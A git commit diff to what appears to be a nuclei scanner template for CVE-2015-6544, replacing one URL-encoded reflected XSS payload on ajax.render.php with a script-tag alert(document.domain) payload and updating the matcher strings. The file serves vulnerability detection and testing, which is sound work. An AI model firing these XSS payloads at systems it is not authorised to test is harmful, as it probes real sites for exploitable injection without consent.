Update CVE-2015-6544.yaml

patch-1
Prince Chaddha 2021-07-29 00:16:01 +05:30 committed by GitHub
parent b65ac6853e
commit feb0af88eb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions

View File

@ -12,13 +12,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%3Cimg%20src%3D%22x%22%20onerror%3Djavascript%3Aalert%28document.domain%29%3B%3E"
- "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '<img src="x" onerror=javascript:alert(document.domain);>'
- '</script><script>alert(document.domain)</script>'
part: body
- type: status